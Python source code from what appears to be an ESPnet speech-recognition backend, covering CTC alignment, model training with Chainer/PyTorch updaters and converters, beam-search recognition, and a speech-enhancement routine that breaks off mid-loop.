model, train_args = load_trained_model(args.model)
assert isinstance(model, ASRInterface)
model.eval()
load_inputs_and_targets = LoadInputsAndTargets(
mode="asr",
load_output=True,
sort_in_input_length=False,
preprocess_conf=train_args.preprocess_conf
if args.preprocess_conf is None
else args.preprocess_conf,
preprocess_args={"train": False},
)
if args.ngpu > 1:
raise NotImplementedError("only single GPU decoding is supported")
if args.ngpu == 1:
device = "cuda"
else:
device = "cpu"
dtype = getattr(torch, args.dtype)
logging.info(f"Decoding device={device}, dtype={dtype}")
model.to(device=device, dtype=dtype).eval()
# read json data
with open(args.align_json, "rb") as f:
js = json.load(f)["utts"]
new_js = {}
if args.batchsize == 0:
with torch.no_grad():
for idx, name in enumerate(js.keys(), 1):
logging.info("(%d/%d) aligning " + name, idx, len(js.keys()))
batch = [(name, js[name])]
feat, label = load_inputs_and_targets(batch)
feat = feat[0]
label = label[0]
enc = model.encode(torch.as_tensor(feat).to(device)).unsqueeze(0)
alignment = model.ctc.forced_align(enc, label)
new_js[name] = add_alignment_to_json(
js[name], alignment, train_args.char_list
)
else:
raise NotImplementedError("Align_batch is not implemented.")
with open(args.result_label, "wb") as f:
f.write(
json.dumps(
{"utts": new_js}, indent=4, ensure_ascii=False, sort_keys=True
).encode("utf_8")
)
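# A tiny sketch of the alignment-to-token mapping performed by add_alignment_to_json
# inside ctc_align(): each frame-level CTC alignment id is looked up in char_list and
# the tokens are joined with spaces (toy, hypothetical values).
def _alignment_tokens_example():
    char_list = ["<blank>", "a", "b"]
    alignment = [0, 1, 1, 0, 2]
    return " ".join(char_list[a] for a in alignment)
# e.g. _alignment_tokens_example() -> "<blank> a a <blank> b"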
| 35.785276
| 88
| 0.561232
|
import copy
import json
import logging
import math
import os
import sys
from chainer import reporter as reporter_module
from chainer import training
from chainer.training import extensions
from chainer.training.updater import StandardUpdater
import numpy as np
from tensorboardX import SummaryWriter
import torch
from torch.nn.parallel import data_parallel
from espnet.asr.asr_utils import adadelta_eps_decay
from espnet.asr.asr_utils import add_results_to_json
from espnet.asr.asr_utils import CompareValueTrigger
from espnet.asr.asr_utils import format_mulenc_args
from espnet.asr.asr_utils import get_model_conf
from espnet.asr.asr_utils import plot_spectrogram
from espnet.asr.asr_utils import restore_snapshot
from espnet.asr.asr_utils import snapshot_object
from espnet.asr.asr_utils import torch_load
from espnet.asr.asr_utils import torch_resume
from espnet.asr.asr_utils import torch_snapshot
from espnet.asr.pytorch_backend.asr_init_rnn_t import freeze_modules
from espnet.asr.pytorch_backend.asr_init_rnn_t import load_trained_model
from espnet.asr.pytorch_backend.asr_init_rnn_t import load_trained_modules
import espnet.lm.pytorch_backend.extlm as extlm_pytorch
from espnet.nets.asr_interface import ASRInterface
from espnet.nets.beam_search_transducer import BeamSearchTransducer
from espnet.nets.pytorch_backend.e2e_asr import pad_list
import espnet.nets.pytorch_backend.lm.default as lm_pytorch
from espnet.nets.pytorch_backend.streaming.segment import SegmentStreamingE2E
from espnet.nets.pytorch_backend.streaming.window import WindowStreamingE2E
from espnet.transform.spectrogram import IStft
from espnet.transform.transformation import Transformation
from espnet.utils.cli_writers import file_writer_helper
from espnet.utils.dataset import ChainerDataLoader
from espnet.utils.dataset import TransformDataset
from espnet.utils.deterministic_utils import set_deterministic_pytorch
from espnet.utils.dynamic_import import dynamic_import
from espnet.utils.io_utils import LoadInputsAndTargets
from espnet.utils.training.batchfy import make_batchset
from espnet.utils.training.evaluator import BaseEvaluator
from espnet.utils.training.iterators import ShufflingEnabler
from espnet.utils.training.tensorboard_logger import TensorboardLogger
from espnet.utils.training.train_utils import check_early_stop
from espnet.utils.training.train_utils import set_early_stop
import matplotlib
matplotlib.use("Agg")
if sys.version_info[0] == 2:
from itertools import izip_longest as zip_longest
else:
from itertools import zip_longest as zip_longest
def _recursive_to(xs, device):
if torch.is_tensor(xs):
return xs.to(device)
if isinstance(xs, tuple):
return tuple(_recursive_to(x, device) for x in xs)
return xs
class CustomEvaluator(BaseEvaluator):
def __init__(self, model, iterator, target, device, ngpu=None):
super(CustomEvaluator, self).__init__(iterator, target)
self.model = model
self.device = device
if ngpu is not None:
self.ngpu = ngpu
elif device.type == "cpu":
self.ngpu = 0
else:
self.ngpu = 1
def evaluate(self):
iterator = self._iterators["main"]
if self.eval_hook:
self.eval_hook(self)
if hasattr(iterator, "reset"):
iterator.reset()
it = iterator
else:
it = copy.copy(iterator)
summary = reporter_module.DictSummary()
self.model.eval()
with torch.no_grad():
for batch in it:
x = _recursive_to(batch, self.device)
observation = {}
with reporter_module.report_scope(observation):
if self.ngpu == 0:
self.model(*x)
else:
data_parallel(self.model, x, range(self.ngpu))
summary.add(observation)
self.model.train()
return summary.compute_mean()
class CustomUpdater(StandardUpdater):
def __init__(
self,
model,
grad_clip_threshold,
train_iter,
optimizer,
device,
ngpu,
grad_noise=False,
accum_grad=1,
use_apex=False,
):
super(CustomUpdater, self).__init__(train_iter, optimizer)
self.model = model
self.grad_clip_threshold = grad_clip_threshold
self.device = device
self.ngpu = ngpu
self.accum_grad = accum_grad
self.forward_count = 0
self.grad_noise = grad_noise
self.iteration = 0
self.use_apex = use_apex
def update_core(self):
train_iter = self.get_iterator("main")
optimizer = self.get_optimizer("main")
epoch = train_iter.epoch
batch = train_iter.next()
x = _recursive_to(batch, self.device)
is_new_epoch = train_iter.epoch != epoch
if self.ngpu == 0:
loss = self.model(*x).mean() / self.accum_grad
else:
loss = (
data_parallel(self.model, x, range(self.ngpu)).mean() / self.accum_grad
)
if self.use_apex:
from apex import amp
opt = optimizer.optimizer if hasattr(optimizer, "optimizer") else optimizer
with amp.scale_loss(loss, opt) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
if self.grad_noise:
from espnet.asr.asr_utils import add_gradient_noise
add_gradient_noise(
self.model, self.iteration, duration=100, eta=1.0, scale_factor=0.55
)
self.forward_count += 1
if not is_new_epoch and self.forward_count != self.accum_grad:
return
self.forward_count = 0
grad_norm = torch.nn.utils.clip_grad_norm_(
self.model.parameters(), self.grad_clip_threshold
)
logging.info("grad norm={}".format(grad_norm))
if math.isnan(grad_norm):
logging.warning("grad norm is nan. Do not update model.")
else:
optimizer.step()
optimizer.zero_grad()
def update(self):
self.update_core()
if self.forward_count == 0:
self.iteration += 1
class CustomConverter(object):
def __init__(self, subsampling_factor=1, dtype=torch.float32):
self.subsampling_factor = subsampling_factor
self.ignore_id = -1
self.dtype = dtype
def __call__(self, batch, device=torch.device("cpu")):
assert len(batch) == 1
xs, ys = batch[0]
if self.subsampling_factor > 1:
xs = [x[:: self.subsampling_factor, :] for x in xs]
ilens = np.array([x.shape[0] for x in xs])
if xs[0].dtype.kind == "c":
xs_pad_real = pad_list(
[torch.from_numpy(x.real).float() for x in xs], 0
).to(device, dtype=self.dtype)
xs_pad_imag = pad_list(
[torch.from_numpy(x.imag).float() for x in xs], 0
).to(device, dtype=self.dtype)
# because torch.nn.DataParallel can't handle it.
xs_pad = {"real": xs_pad_real, "imag": xs_pad_imag}
else:
xs_pad = pad_list([torch.from_numpy(x).float() for x in xs], 0).to(
device, dtype=self.dtype
)
ilens = torch.from_numpy(ilens).to(device)
ys_pad = pad_list(
[
torch.from_numpy(
np.array(y[0][:]) if isinstance(y, tuple) else y
).long()
for y in ys
],
self.ignore_id,
).to(device)
return xs_pad, ilens, ys_pad
class CustomConverterMulEnc(object):
def __init__(self, subsampling_factors=[1, 1], dtype=torch.float32):
self.subsampling_factors = subsampling_factors
self.ignore_id = -1
self.dtype = dtype
self.num_encs = len(subsampling_factors)
def __call__(self, batch, device=torch.device("cpu")):
assert len(batch) == 1
xs_list = batch[0][: self.num_encs]
ys = batch[0][-1]
if np.sum(self.subsampling_factors) > self.num_encs:
xs_list = [
[x[:: self.subsampling_factors[i], :] for x in xs_list[i]]
for i in range(self.num_encs)
]
ilens_list = [
np.array([x.shape[0] for x in xs_list[i]]) for i in range(self.num_encs)
]
xs_list_pad = [
pad_list([torch.from_numpy(x).float() for x in xs_list[i]], 0).to(
device, dtype=self.dtype
)
for i in range(self.num_encs)
]
ilens_list = [
torch.from_numpy(ilens_list[i]).to(device) for i in range(self.num_encs)
]
ys_pad = pad_list(
[
torch.from_numpy(np.array(y[0]) if isinstance(y, tuple) else y).long()
for y in ys
],
self.ignore_id,
).to(device)
return xs_list_pad, ilens_list, ys_pad
def train(args):
set_deterministic_pytorch(args)
if args.num_encs > 1:
args = format_mulenc_args(args)
if not torch.cuda.is_available():
logging.warning("cuda is not available")
with open(args.valid_json, "rb") as f:
valid_json = json.load(f)["utts"]
utts = list(valid_json.keys())
idim_list = [
int(valid_json[utts[0]]["input"][i]["shape"][-1]) for i in range(args.num_encs)
]
odim = int(valid_json[utts[0]]["output"][0]["shape"][-1])
if hasattr(args, "decoder_mode") and args.decoder_mode == "maskctc":
odim += 1
for i in range(args.num_encs):
logging.info("stream{}: input dims : {}".format(i + 1, idim_list[i]))
logging.info("#output dims: " + str(odim))
if "transducer" in args.model_module:
if (
getattr(args, "etype", False) == "transformer"
or getattr(args, "dtype", False) == "transformer"
):
mtl_mode = "transformer_transducer"
else:
mtl_mode = "transducer"
logging.info("Pure transducer mode")
elif args.mtlalpha == 1.0:
mtl_mode = "ctc"
logging.info("Pure CTC mode")
elif args.mtlalpha == 0.0:
mtl_mode = "att"
logging.info("Pure attention mode")
else:
mtl_mode = "mtl"
logging.info("Multitask learning mode")
if (args.enc_init is not None or args.dec_init is not None) and args.num_encs == 1:
model = load_trained_modules(idim_list[0], odim, args)
else:
model_class = dynamic_import(args.model_module)
model = model_class(
idim_list[0] if args.num_encs == 1 else idim_list, odim, args
)
assert isinstance(model, ASRInterface)
logging.info(
" Total parameter of the model = "
+ str(sum(p.numel() for p in model.parameters()))
)
if args.rnnlm is not None:
rnnlm_args = get_model_conf(args.rnnlm, args.rnnlm_conf)
rnnlm = lm_pytorch.ClassifierWithState(
lm_pytorch.RNNLM(len(args.char_list), rnnlm_args.layer, rnnlm_args.unit)
)
torch_load(args.rnnlm, rnnlm)
model.rnnlm = rnnlm
if not os.path.exists(args.outdir):
os.makedirs(args.outdir)
model_conf = args.outdir + "/model.json"
with open(model_conf, "wb") as f:
logging.info("writing a model config file to " + model_conf)
f.write(
json.dumps(
(idim_list[0] if args.num_encs == 1 else idim_list, odim, vars(args)),
indent=4,
ensure_ascii=False,
sort_keys=True,
).encode("utf_8")
)
for key in sorted(vars(args).keys()):
logging.info("ARGS: " + key + ": " + str(vars(args)[key]))
reporter = model.reporter
if args.ngpu > 1:
if args.batch_size != 0:
logging.warning(
"batch size is automatically increased (%d -> %d)"
% (args.batch_size, args.batch_size * args.ngpu)
)
args.batch_size *= args.ngpu
if args.num_encs > 1:
raise NotImplementedError(
"Data parallel is not supported for multi-encoder setup."
)
device = torch.device("cuda" if args.ngpu > 0 else "cpu")
if args.train_dtype in ("float16", "float32", "float64"):
dtype = getattr(torch, args.train_dtype)
else:
dtype = torch.float32
model = model.to(device=device, dtype=dtype)
if args.freeze_mods:
model, model_params = freeze_modules(model, args.freeze_mods)
else:
model_params = model.parameters()
if args.opt == "adadelta":
optimizer = torch.optim.Adadelta(
model_params, rho=0.95, eps=args.eps, weight_decay=args.weight_decay
)
elif args.opt == "adam":
optimizer = torch.optim.Adam(model_params, weight_decay=args.weight_decay)
elif args.opt == "noam":
from espnet.nets.pytorch_backend.transformer.optimizer import get_std_opt
if hasattr(args, "enc_block_arch") or hasattr(args, "dec_block_arch"):
adim = model.most_dom_dim
else:
adim = args.adim
optimizer = get_std_opt(
model_params, adim, args.transformer_warmup_steps, args.transformer_lr
)
else:
raise NotImplementedError("unknown optimizer: " + args.opt)
if args.train_dtype in ("O0", "O1", "O2", "O3"):
try:
from apex import amp
except ImportError as e:
logging.error(
f"You need to install apex for --train-dtype {args.train_dtype}. "
"See https://github.com/NVIDIA/apex#linux"
)
raise e
if args.opt == "noam":
model, optimizer.optimizer = amp.initialize(
model, optimizer.optimizer, opt_level=args.train_dtype
)
else:
model, optimizer = amp.initialize(
model, optimizer, opt_level=args.train_dtype
)
use_apex = True
from espnet.nets.pytorch_backend.ctc import CTC
amp.register_float_function(CTC, "loss_fn")
amp.init()
logging.warning("register ctc as float function")
else:
use_apex = False
setattr(optimizer, "target", reporter)
setattr(optimizer, "serialize", lambda s: reporter.serialize(s))
if args.num_encs == 1:
converter = CustomConverter(subsampling_factor=model.subsample[0], dtype=dtype)
else:
converter = CustomConverterMulEnc(
[i[0] for i in model.subsample_list], dtype=dtype
)
with open(args.train_json, "rb") as f:
train_json = json.load(f)["utts"]
with open(args.valid_json, "rb") as f:
valid_json = json.load(f)["utts"]
use_sortagrad = args.sortagrad == -1 or args.sortagrad > 0
train = make_batchset(
train_json,
args.batch_size,
args.maxlen_in,
args.maxlen_out,
args.minibatches,
min_batch_size=args.ngpu if args.ngpu > 1 else 1,
shortest_first=use_sortagrad,
count=args.batch_count,
batch_bins=args.batch_bins,
batch_frames_in=args.batch_frames_in,
batch_frames_out=args.batch_frames_out,
batch_frames_inout=args.batch_frames_inout,
iaxis=0,
oaxis=0,
)
valid = make_batchset(
valid_json,
args.batch_size,
args.maxlen_in,
args.maxlen_out,
args.minibatches,
min_batch_size=args.ngpu if args.ngpu > 1 else 1,
count=args.batch_count,
batch_bins=args.batch_bins,
batch_frames_in=args.batch_frames_in,
batch_frames_out=args.batch_frames_out,
batch_frames_inout=args.batch_frames_inout,
iaxis=0,
oaxis=0,
)
load_tr = LoadInputsAndTargets(
mode="asr",
load_output=True,
preprocess_conf=args.preprocess_conf,
preprocess_args={"train": True},
)
load_cv = LoadInputsAndTargets(
mode="asr",
load_output=True,
preprocess_conf=args.preprocess_conf,
preprocess_args={"train": False},
)
train_iter = ChainerDataLoader(
dataset=TransformDataset(train, lambda data: converter([load_tr(data)])),
batch_size=1,
num_workers=args.n_iter_processes,
shuffle=not use_sortagrad,
collate_fn=lambda x: x[0],
)
valid_iter = ChainerDataLoader(
dataset=TransformDataset(valid, lambda data: converter([load_cv(data)])),
batch_size=1,
shuffle=False,
collate_fn=lambda x: x[0],
num_workers=args.n_iter_processes,
)
updater = CustomUpdater(
model,
args.grad_clip,
{"main": train_iter},
optimizer,
device,
args.ngpu,
args.grad_noise,
args.accum_grad,
use_apex=use_apex,
)
trainer = training.Trainer(updater, (args.epochs, "epoch"), out=args.outdir)
if use_sortagrad:
trainer.extend(
ShufflingEnabler([train_iter]),
trigger=(args.sortagrad if args.sortagrad != -1 else args.epochs, "epoch"),
)
if args.resume:
logging.info("resumed from %s" % args.resume)
torch_resume(args.resume, trainer)
if args.save_interval_iters > 0:
trainer.extend(
CustomEvaluator(model, {"main": valid_iter}, reporter, device, args.ngpu),
trigger=(args.save_interval_iters, "iteration"),
)
else:
trainer.extend(
CustomEvaluator(model, {"main": valid_iter}, reporter, device, args.ngpu)
)
is_attn_plot = (
(
"transformer" in args.model_module
or "conformer" in args.model_module
or mtl_mode in ["att", "mtl"]
)
or (
mtl_mode == "transducer" and getattr(args, "rnnt_mode", False) == "rnnt-att"
)
or mtl_mode == "transformer_transducer"
)
if args.num_save_attention > 0 and is_attn_plot:
data = sorted(
list(valid_json.items())[: args.num_save_attention],
key=lambda x: int(x[1]["input"][0]["shape"][1]),
reverse=True,
)
if hasattr(model, "module"):
att_vis_fn = model.module.calculate_all_attentions
plot_class = model.module.attention_plot_class
else:
att_vis_fn = model.calculate_all_attentions
plot_class = model.attention_plot_class
att_reporter = plot_class(
att_vis_fn,
data,
args.outdir + "/att_ws",
converter=converter,
transform=load_cv,
device=device,
)
trainer.extend(att_reporter, trigger=(1, "epoch"))
else:
att_reporter = None
if mtl_mode in ["ctc", "mtl"] and args.num_save_ctc > 0:
data = sorted(
list(valid_json.items())[: args.num_save_ctc],
key=lambda x: int(x[1]["output"][0]["shape"][0]),
reverse=True,
)
if hasattr(model, "module"):
ctc_vis_fn = model.module.calculate_all_ctc_probs
plot_class = model.module.ctc_plot_class
else:
ctc_vis_fn = model.calculate_all_ctc_probs
plot_class = model.ctc_plot_class
ctc_reporter = plot_class(
ctc_vis_fn,
data,
args.outdir + "/ctc_prob",
converter=converter,
transform=load_cv,
device=device,
ikey="output",
iaxis=1,
)
trainer.extend(ctc_reporter, trigger=(1, "epoch"))
else:
ctc_reporter = None
if args.num_encs > 1:
report_keys_loss_ctc = [
"main/loss_ctc{}".format(i + 1) for i in range(model.num_encs)
] + ["validation/main/loss_ctc{}".format(i + 1) for i in range(model.num_encs)]
report_keys_cer_ctc = [
"main/cer_ctc{}".format(i + 1) for i in range(model.num_encs)
] + ["validation/main/cer_ctc{}".format(i + 1) for i in range(model.num_encs)]
trainer.extend(
extensions.PlotReport(
[
"main/loss",
"validation/main/loss",
"main/loss_ctc",
"validation/main/loss_ctc",
"main/loss_att",
"validation/main/loss_att",
]
+ ([] if args.num_encs == 1 else report_keys_loss_ctc),
"epoch",
file_name="loss.png",
)
)
trainer.extend(
extensions.PlotReport(
["main/acc", "validation/main/acc"], "epoch", file_name="acc.png"
)
)
trainer.extend(
extensions.PlotReport(
["main/cer_ctc", "validation/main/cer_ctc"]
+ ([] if args.num_encs == 1 else report_keys_loss_ctc),
"epoch",
file_name="cer.png",
)
)
trainer.extend(
snapshot_object(model, "model.loss.best"),
trigger=training.triggers.MinValueTrigger("validation/main/loss"),
)
if mtl_mode not in ["ctc", "transducer", "transformer_transducer"]:
trainer.extend(
snapshot_object(model, "model.acc.best"),
trigger=training.triggers.MaxValueTrigger("validation/main/acc"),
)
if args.save_interval_iters > 0:
trainer.extend(
torch_snapshot(filename="snapshot.iter.{.updater.iteration}"),
trigger=(args.save_interval_iters, "iteration"),
)
else:
trainer.extend(torch_snapshot(), trigger=(1, "epoch"))
if args.opt == "adadelta":
if args.criterion == "acc" and mtl_mode != "ctc":
trainer.extend(
restore_snapshot(
model, args.outdir + "/model.acc.best", load_fn=torch_load
),
trigger=CompareValueTrigger(
"validation/main/acc",
lambda best_value, current_value: best_value > current_value,
),
)
trainer.extend(
adadelta_eps_decay(args.eps_decay),
trigger=CompareValueTrigger(
"validation/main/acc",
lambda best_value, current_value: best_value > current_value,
),
)
elif args.criterion == "loss":
trainer.extend(
restore_snapshot(
model, args.outdir + "/model.loss.best", load_fn=torch_load
),
trigger=CompareValueTrigger(
"validation/main/loss",
lambda best_value, current_value: best_value < current_value,
),
)
trainer.extend(
adadelta_eps_decay(args.eps_decay),
trigger=CompareValueTrigger(
"validation/main/loss",
lambda best_value, current_value: best_value < current_value,
),
)
# NOTE: In some cases, it may take more than one epoch for the model's loss to escape from a local minimum.
# Thus, restore_snapshot extension is not used here.
# see details in https://github.com/espnet/espnet/pull/2171
elif args.criterion == "loss_eps_decay_only":
trainer.extend(
adadelta_eps_decay(args.eps_decay),
trigger=CompareValueTrigger(
"validation/main/loss",
lambda best_value, current_value: best_value < current_value,
),
)
# Write a log of evaluation statistics for each epoch
trainer.extend(
extensions.LogReport(trigger=(args.report_interval_iters, "iteration"))
)
report_keys = [
"epoch",
"iteration",
"main/loss",
"main/loss_ctc",
"main/loss_att",
"validation/main/loss",
"validation/main/loss_ctc",
"validation/main/loss_att",
"main/acc",
"validation/main/acc",
"main/cer_ctc",
"validation/main/cer_ctc",
"elapsed_time",
] + ([] if args.num_encs == 1 else report_keys_cer_ctc + report_keys_loss_ctc)
if args.opt == "adadelta":
trainer.extend(
extensions.observe_value(
"eps",
lambda trainer: trainer.updater.get_optimizer("main").param_groups[0][
"eps"
],
),
trigger=(args.report_interval_iters, "iteration"),
)
report_keys.append("eps")
if args.report_cer:
report_keys.append("validation/main/cer")
if args.report_wer:
report_keys.append("validation/main/wer")
trainer.extend(
extensions.PrintReport(report_keys),
trigger=(args.report_interval_iters, "iteration"),
)
trainer.extend(extensions.ProgressBar(update_interval=args.report_interval_iters))
set_early_stop(trainer, args)
if args.tensorboard_dir is not None and args.tensorboard_dir != "":
trainer.extend(
TensorboardLogger(
SummaryWriter(args.tensorboard_dir),
att_reporter=att_reporter,
ctc_reporter=ctc_reporter,
),
trigger=(args.report_interval_iters, "iteration"),
)
# Run the training
trainer.run()
check_early_stop(trainer, args.epochs)
def recog(args):
set_deterministic_pytorch(args)
model, train_args = load_trained_model(args.model)
assert isinstance(model, ASRInterface)
model.recog_args = args
if args.streaming_mode and "transformer" in train_args.model_module:
raise NotImplementedError("streaming mode for transformer is not implemented")
logging.info(
" Total parameter of the model = "
+ str(sum(p.numel() for p in model.parameters()))
)
# read rnnlm
if args.rnnlm:
rnnlm_args = get_model_conf(args.rnnlm, args.rnnlm_conf)
if getattr(rnnlm_args, "model_module", "default") != "default":
raise ValueError(
"use '--api v2' option to decode with non-default language model"
)
rnnlm = lm_pytorch.ClassifierWithState(
lm_pytorch.RNNLM(
len(train_args.char_list),
rnnlm_args.layer,
rnnlm_args.unit,
getattr(rnnlm_args, "embed_unit", None), # for backward compatibility
)
)
torch_load(args.rnnlm, rnnlm)
rnnlm.eval()
else:
rnnlm = None
if args.word_rnnlm:
rnnlm_args = get_model_conf(args.word_rnnlm, args.word_rnnlm_conf)
word_dict = rnnlm_args.char_list_dict
char_dict = {x: i for i, x in enumerate(train_args.char_list)}
word_rnnlm = lm_pytorch.ClassifierWithState(
lm_pytorch.RNNLM(
len(word_dict),
rnnlm_args.layer,
rnnlm_args.unit,
getattr(rnnlm_args, "embed_unit", None), # for backward compatibility
)
)
torch_load(args.word_rnnlm, word_rnnlm)
word_rnnlm.eval()
if rnnlm is not None:
rnnlm = lm_pytorch.ClassifierWithState(
extlm_pytorch.MultiLevelLM(
word_rnnlm.predictor, rnnlm.predictor, word_dict, char_dict
)
)
else:
rnnlm = lm_pytorch.ClassifierWithState(
extlm_pytorch.LookAheadWordLM(
word_rnnlm.predictor, word_dict, char_dict
)
)
# gpu
if args.ngpu == 1:
gpu_id = list(range(args.ngpu))
logging.info("gpu id: " + str(gpu_id))
model.cuda()
if rnnlm:
rnnlm.cuda()
# read json data
with open(args.recog_json, "rb") as f:
js = json.load(f)["utts"]
# NOTE: limit the number of utterances to decode
F_data = {}
count = 0
for k, v in js.items():
# if js[k]['utt2spk'] == 'FC01':
if count < 15:
F_data[k] = v
count += 1
js = F_data
new_js = {}
load_inputs_and_targets = LoadInputsAndTargets(
mode="asr",
load_output=False,
sort_in_input_length=False,
preprocess_conf=train_args.preprocess_conf
if args.preprocess_conf is None
else args.preprocess_conf,
preprocess_args={"train": False},
)
# load transducer beam search
if hasattr(model, "rnnt_mode"):
if hasattr(model, "dec"):
trans_decoder = model.dec
else:
trans_decoder = model.decoder
beam_search_transducer = BeamSearchTransducer(
decoder=trans_decoder,
beam_size=args.beam_size,
lm=rnnlm,
lm_weight=args.lm_weight,
# search_type=args.search_type,
# max_sym_exp=args.max_sym_exp,
# u_max=args.u_max, # 50
# nstep=args.nstep,
# prefix_alpha=args.prefix_alpha,
# score_norm=args.score_norm,
)
if args.batchsize == 0:
with torch.no_grad():
for idx, name in enumerate(js.keys(), 1):
logging.info("(%d/%d) decoding " + name, idx, len(js.keys()))
batch = [(name, js[name])]
feat = load_inputs_and_targets(batch)
feat = (
feat[0][0]
if args.num_encs == 1
else [feat[idx][0] for idx in range(model.num_encs)]
)
if args.streaming_mode == "window" and args.num_encs == 1:
logging.info(
"Using streaming recognizer with window size %d frames",
args.streaming_window,
)
se2e = WindowStreamingE2E(e2e=model, recog_args=args, rnnlm=rnnlm)
for i in range(0, feat.shape[0], args.streaming_window):
logging.info(
"Feeding frames %d - %d", i, i + args.streaming_window
)
se2e.accept_input(feat[i : i + args.streaming_window])
logging.info("Running offline attention decoder")
se2e.decode_with_attention_offline()
logging.info("Offline attention decoder finished")
nbest_hyps = se2e.retrieve_recognition()
elif args.streaming_mode == "segment" and args.num_encs == 1:
logging.info(
"Using streaming recognizer with threshold value %d",
args.streaming_min_blank_dur,
)
nbest_hyps = []
for n in range(args.nbest):
nbest_hyps.append({"yseq": [], "score": 0.0})
se2e = SegmentStreamingE2E(e2e=model, recog_args=args, rnnlm=rnnlm)
r = np.prod(model.subsample)
for i in range(0, feat.shape[0], r):
hyps = se2e.accept_input(feat[i : i + r])
if hyps is not None:
text = "".join(
[
train_args.char_list[int(x)]
for x in hyps[0]["yseq"][1:-1]
if int(x) != -1
]
)
text = text.replace(
"\u2581", " "
).strip() # for SentencePiece
text = text.replace(model.space, " ")
text = text.replace(model.blank, "")
logging.info(text)
for n in range(args.nbest):
nbest_hyps[n]["yseq"].extend(hyps[n]["yseq"])
nbest_hyps[n]["score"] += hyps[n]["score"]
elif hasattr(model, "decoder_mode") and model.decoder_mode == "maskctc":
nbest_hyps = model.recognize_maskctc(
feat, args, train_args.char_list
)
elif hasattr(model, "rnnt_mode"):
nbest_hyps = model.recognize(feat, beam_search_transducer)
else:
nbest_hyps = model.recognize(
feat, args, train_args.char_list, rnnlm
)
new_js[name] = add_results_to_json(
js[name], nbest_hyps, train_args.char_list
)
else:
def grouper(n, iterable, fillvalue=None):
kargs = [iter(iterable)] * n
return zip_longest(*kargs, fillvalue=fillvalue)
# sort data if batchsize > 1
keys = list(js.keys())
if args.batchsize > 1:
feat_lens = [js[key]["input"][0]["shape"][0] for key in keys]
sorted_index = sorted(range(len(feat_lens)), key=lambda i: -feat_lens[i])
keys = [keys[i] for i in sorted_index]
with torch.no_grad():
for names in grouper(args.batchsize, keys, None):
names = [name for name in names if name]
batch = [(name, js[name]) for name in names]
feats = (
load_inputs_and_targets(batch)[0]
if args.num_encs == 1
else load_inputs_and_targets(batch)
)
if args.streaming_mode == "window" and args.num_encs == 1:
raise NotImplementedError
elif args.streaming_mode == "segment" and args.num_encs == 1:
if args.batchsize > 1:
raise NotImplementedError
feat = feats[0]
nbest_hyps = []
for n in range(args.nbest):
nbest_hyps.append({"yseq": [], "score": 0.0})
se2e = SegmentStreamingE2E(e2e=model, recog_args=args, rnnlm=rnnlm)
r = np.prod(model.subsample)
for i in range(0, feat.shape[0], r):
hyps = se2e.accept_input(feat[i : i + r])
if hyps is not None:
text = "".join(
[
train_args.char_list[int(x)]
for x in hyps[0]["yseq"][1:-1]
if int(x) != -1
]
)
text = text.replace(
"\u2581", " "
).strip() # for SentencePiece
text = text.replace(model.space, " ")
text = text.replace(model.blank, "")
logging.info(text)
for n in range(args.nbest):
nbest_hyps[n]["yseq"].extend(hyps[n]["yseq"])
nbest_hyps[n]["score"] += hyps[n]["score"]
nbest_hyps = [nbest_hyps]
else:
nbest_hyps = model.recognize_batch(
feats, args, train_args.char_list, rnnlm=rnnlm
)
for i, nbest_hyp in enumerate(nbest_hyps):
name = names[i]
new_js[name] = add_results_to_json(
js[name], nbest_hyp, train_args.char_list
)
with open(args.result_label, "wb") as f:
f.write(
json.dumps(
{"utts": new_js}, indent=4, ensure_ascii=False, sort_keys=True
).encode("utf_8")
)
def enhance(args):
set_deterministic_pytorch(args)
# read training config
idim, odim, train_args = get_model_conf(args.model, args.model_conf)
# TODO(ruizhili): implement enhance for multi-encoder model
assert args.num_encs == 1, "number of encoder should be 1 ({} is given)".format(
args.num_encs
)
# load trained model parameters
logging.info("reading model parameters from " + args.model)
model_class = dynamic_import(train_args.model_module)
model = model_class(idim, odim, train_args)
assert isinstance(model, ASRInterface)
torch_load(args.model, model)
model.recog_args = args
# gpu
if args.ngpu == 1:
gpu_id = list(range(args.ngpu))
logging.info("gpu id: " + str(gpu_id))
model.cuda()
# read json data
with open(args.recog_json, "rb") as f:
js = json.load(f)["utts"]
load_inputs_and_targets = LoadInputsAndTargets(
mode="asr",
load_output=False,
sort_in_input_length=False,
preprocess_conf=None, # Apply pre_process in outer func
)
if args.batchsize == 0:
args.batchsize = 1
# Creates writers for outputs from the network
if args.enh_wspecifier is not None:
enh_writer = file_writer_helper(args.enh_wspecifier, filetype=args.enh_filetype)
else:
enh_writer = None
# Creates a Transformation instance
preprocess_conf = (
train_args.preprocess_conf
if args.preprocess_conf is None
else args.preprocess_conf
)
if preprocess_conf is not None:
logging.info(f"Use preprocessing: {preprocess_conf}")
transform = Transformation(preprocess_conf)
else:
transform = None
# Creates a IStft instance
istft = None
frame_shift = args.istft_n_shift # Used for plot the spectrogram
if args.apply_istft:
if preprocess_conf is not None:
# Read the conffile and find stft setting
with open(preprocess_conf) as f:
# Json format: e.g.
# {"process": [{"type": "stft",
# "win_length": 400,
# "n_fft": 512, "n_shift": 160,
# "window": "han"},
# {"type": "foo", ...}, ...]}
conf = json.load(f)
assert "process" in conf, conf
# Find stft setting
for p in conf["process"]:
if p["type"] == "stft":
istft = IStft(
win_length=p["win_length"],
n_shift=p["n_shift"],
window=p.get("window", "hann"),
)
logging.info(
"stft is found in {}. "
"Setting istft config from it\n{}".format(
preprocess_conf, istft
)
)
frame_shift = p["n_shift"]
break
if istft is None:
# Set from command line arguments
istft = IStft(
win_length=args.istft_win_length,
n_shift=args.istft_n_shift,
window=args.istft_window,
)
logging.info(
"Setting istft config from the command line args\n{}".format(istft)
)
# sort data
keys = list(js.keys())
feat_lens = [js[key]["input"][0]["shape"][0] for key in keys]
sorted_index = sorted(range(len(feat_lens)), key=lambda i: -feat_lens[i])
keys = [keys[i] for i in sorted_index]
def grouper(n, iterable, fillvalue=None):
kargs = [iter(iterable)] * n
return zip_longest(*kargs, fillvalue=fillvalue)
num_images = 0
if not os.path.exists(args.image_dir):
os.makedirs(args.image_dir)
for names in grouper(args.batchsize, keys, None):
batch = [(name, js[name]) for name in names]
# May be in time region: (Batch, [Time, Channel])
org_feats = load_inputs_and_targets(batch)[0]
if transform is not None:
# May be in time-freq region: : (Batch, [Time, Channel, Freq])
feats = transform(org_feats, train=False)
else:
feats = org_feats
with torch.no_grad():
enhanced, mask, ilens = model.enhance(feats)
for idx, name in enumerate(names):
